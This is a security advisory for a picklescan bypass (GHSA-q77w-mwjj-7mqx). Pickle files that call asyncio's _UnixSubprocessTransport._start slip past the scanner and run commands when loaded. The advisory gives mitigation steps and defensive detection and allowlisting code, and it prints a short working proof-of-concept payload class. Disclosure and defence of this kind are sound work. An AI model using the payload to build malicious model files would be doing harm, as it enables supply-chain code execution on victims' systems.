GHSA-q77w-mwjj-7mqx: picklescan: scanner bypass enables model RCE

GHSA-q77w-mwjj-7mqx MEDIUM
Published August 26, 2025
CISO Take

picklescan, widely used to vet PyTorch and ML model files before loading, fails to flag malicious payloads that abuse Python's built-in asyncio subprocess transport. Any team using picklescan < 0.0.30 as a security gate for model loading has a false safety net — update immediately to 0.0.30. Audit any models loaded from untrusted sources while the vulnerable version was in use; treat them as potentially compromised.

Risk Assessment

High risk in ML pipeline contexts despite the medium CVSS label. The PoC is trivial and public, the attack bypasses the one tool most organizations use specifically to catch this class of threat, and ML teams routinely load third-party models without additional sandboxing. Any pipeline that downloads models from Hugging Face, S3, or other external registries and relies on picklescan for validation is exposed. The false-positive-free pass from the scanner dramatically increases likelihood of successful exploitation.

Affected Systems

| Package    | Ecosystem | Vulnerable Range | Patched |
|------------|-----------|------------------|---------|
| picklescan | pip       | < 0.0.30         | 0.0.30  |


Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Recommended Action

6 steps
  1. PATCH

    Update picklescan to >= 0.0.30 immediately — this is the only direct fix.

  2. AUDIT

    Review model loading history while vulnerable version was in use; flag any models loaded from public or untrusted sources.

  3. FORMAT MIGRATION

    Migrate model storage to the SafeTensors format where possible. SafeTensors stores only raw tensor data and metadata, so it cannot carry the executable payloads that make pickle-based RCE possible.

  4. SANDBOX

    Run model loading in isolated environments (containers, VMs) with no network access and minimal filesystem permissions regardless of scanner results.

  5. DETECT

    Alert on subprocess execution or unexpected network connections during model loading events.

  6. DEFENSE-IN-DEPTH

    Never rely on a single scanner as the sole gate; combine picklescan with static analysis, hash verification, and provenance checks.
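The DETECT step can be prototyped in-process with Python's standard `sys.addaudithook`, which receives a `subprocess.Popen` audit event whenever a child process is spawned. This is a sketch only; production detection should live at the host or container level (eBPF, auditd, EDR), since an attacker with code execution can interfere with in-process hooks:

```python
import subprocess
import sys

spawned = []

def audit(event, args):
    # CPython raises a "subprocess.Popen" audit event for every child process;
    # its args are (executable, args, cwd, env).
    if event == "subprocess.Popen":
        executable, cmd_args, cwd, env = args
        spawned.append((executable, cmd_args))

sys.addaudithook(audit)

# Simulate a model-loading step that covertly spawns a process.
subprocess.run([sys.executable, "-c", "pass"])

if spawned:
    print(f"ALERT: subprocess spawned during model load: {spawned[0][1]}")
```

A hardened variant could raise an exception from the hook to abort the spawn outright rather than merely alerting.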
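As one extra defense-in-depth gate alongside picklescan, a pickle's opcode stream can be inspected with the stdlib `pickletools` module to list every global the file would import, without ever loading it. The allowlist below is illustrative, and the `STACK_GLOBAL` handling is a simplification that holds for straightforward payloads, not a complete scanner:

```python
import os
import pickle
import pickletools

# Illustrative allowlist; extend with the globals your checkpoints actually use.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}

def referenced_globals(data: bytes):
    """Yield (module, name) pairs the pickle would import, without loading it."""
    ops = list(pickletools.genops(data))
    for i, (op, arg, pos) in enumerate(ops):
        if op.name == "GLOBAL":
            # Protocol < 4: argument is "module name" in one string.
            module, name = arg.split(" ", 1)
            yield module, name
        elif op.name == "STACK_GLOBAL":
            # Protocol >= 4: module and name were pushed by earlier string
            # opcodes; taking the last two string args is a simplification.
            strings = [a for o, a, _ in ops[:i]
                       if o.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE")]
            if len(strings) >= 2:
                yield strings[-2], strings[-1]

def is_suspicious(data: bytes) -> bool:
    return any(g not in ALLOWED_GLOBALS for g in referenced_globals(data))

evil = pickle.dumps(os.system)          # pickled by reference: imports a callable
benign = pickle.dumps({"weights": [1, 2, 3]})
```

Because this checks what the pickle *references* rather than matching known-bad names, obscure callables like `_UnixSubprocessTransport._start` fail the allowlist even when a denylist-style scanner misses them.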

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 9 - Risk management system
ISO 42001
A.6.2.6 - AI system supply chain security
NIST AI RMF
MS-2.5 - Risks from third-party AI components are regularly reviewed
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-q77w-mwjj-7mqx?

picklescan, widely used to vet PyTorch and ML model files before loading, fails to flag malicious payloads that abuse Python's built-in asyncio subprocess transport. Any team using picklescan < 0.0.30 as a security gate for model loading has a false safety net — update immediately to 0.0.30. Audit any models loaded from untrusted sources while the vulnerable version was in use; treat them as potentially compromised.

Is GHSA-q77w-mwjj-7mqx actively exploited?

No confirmed active exploitation of GHSA-q77w-mwjj-7mqx has been reported, but organizations should still patch proactively.

How to fix GHSA-q77w-mwjj-7mqx?

1. PATCH: Update picklescan to >= 0.0.30 immediately; this is the only direct fix.
2. AUDIT: Review model loading history while the vulnerable version was in use; flag any models loaded from public or untrusted sources.
3. FORMAT MIGRATION: Migrate model storage to the SafeTensors format where possible; SafeTensors stores only tensor data and cannot carry pickle-based executable payloads.
4. SANDBOX: Run model loading in isolated environments (containers, VMs) with no network access and minimal filesystem permissions, regardless of scanner results.
5. DETECT: Alert on subprocess execution or unexpected network connections during model loading events.
6. DEFENSE-IN-DEPTH: Never rely on a single scanner as the sole gate; combine picklescan with static analysis, hash verification, and provenance checks.

What systems are affected by GHSA-q77w-mwjj-7mqx?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps model registries, CI/CD for ML, data science notebooks.

What is the CVSS score for GHSA-q77w-mwjj-7mqx?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary

The payload abuses `asyncio.unix_events._UnixSubprocessTransport._start`, a function from Python's built-in asyncio library, to execute a command when a pickle file is loaded.

### Details

The attack proceeds in two steps. First, the attacker crafts a payload whose `__reduce__` method returns a call to `asyncio.unix_events._UnixSubprocessTransport._start`. Then the victim scans the pickle file with the picklescan library, which does not detect any dangerous functions, and proceeds to `pickle.load()` the malicious file, leading to remote code execution.

### PoC

```python
from asyncio.unix_events import _UnixSubprocessTransport
from types import SimpleNamespace

class EvilAsyncioUnixSubprocessTransportStart:
    def __reduce__(self):
        fake_self = SimpleNamespace(_loop=None, _protocol=None, _proc=None)
        args = "whoami"
        return _UnixSubprocessTransport._start, (
            fake_self, args, True, None, None, None, 0
        )
```

### Impact

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected by the scanner but executes when the file is loaded. Supply chain attack: attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.

### Corresponding

https://github.com/FredericDT
https://github.com/Qhaoduoyu
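The PoC works because `pickle.load` invokes whatever callable `__reduce__` returns, with the arguments it supplies. The mechanism can be shown safely with a benign stand-in: the `record` function below is hypothetical and merely logs its argument, standing in for the subprocess-spawning function the real payload resolves:

```python
import pickle

calls = []

def record(cmd):
    # Benign stand-in for the command execution the real payload performs.
    calls.append(cmd)
    return cmd

class Demo:
    def __reduce__(self):
        # pickle.load will call record("whoami"); any importable callable works.
        return record, ("whoami",)

blob = pickle.dumps(Demo())
obj = pickle.loads(blob)   # triggers record("whoami") during deserialization
```

A scanner that only denylists well-known dangerous names (`os.system`, `subprocess.Popen`, `eval`, ...) misses any equally capable callable outside its list, which is exactly the gap `_UnixSubprocessTransport._start` exploits.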

Exploitation Scenario

An attacker publishes a weaponized PyTorch model to Hugging Face or an S3 bucket accessible to the target organization. The model file contains a crafted __reduce__ method that calls asyncio.unix_events._UnixSubprocessTransport._start with a command payload (e.g., reverse shell or credential harvester). The victim's automated ML pipeline downloads the model, runs picklescan for validation — which returns clean — then calls torch.load(), triggering the payload with the privileges of the ML service account. In a CI/CD context this grants full pipeline access; in a model serving context it may expose inference infrastructure, training data, and API keys stored in the environment.
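Pending the patch, loading can also be hardened with the allowlisting approach described in the `pickle` module documentation: subclass `pickle.Unpickler` and override `find_class` so that only explicitly approved globals resolve. The allowlist below is illustrative; for PyTorch specifically, `torch.load(..., weights_only=True)` applies the same idea:

```python
import io
import pickle

# Illustrative allowlist; extend with the classes your checkpoints actually need.
SAFE_GLOBALS = {
    ("collections", "OrderedDict"),
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle tries to resolve.
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

# Plain data loads fine; anything resolving an unlisted callable is rejected.
ok = restricted_loads(pickle.dumps({"weights": [1.0, 2.0]}))

import os
try:
    restricted_loads(pickle.dumps(os.system))
except pickle.UnpicklingError as e:
    blocked = str(e)
```

Unlike a pre-load scanner, this enforces the policy at deserialization time, so a payload the scanner missed still cannot resolve the callable it needs.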

Timeline

Published
August 26, 2025
Last Modified
August 26, 2025
First Seen
March 24, 2026
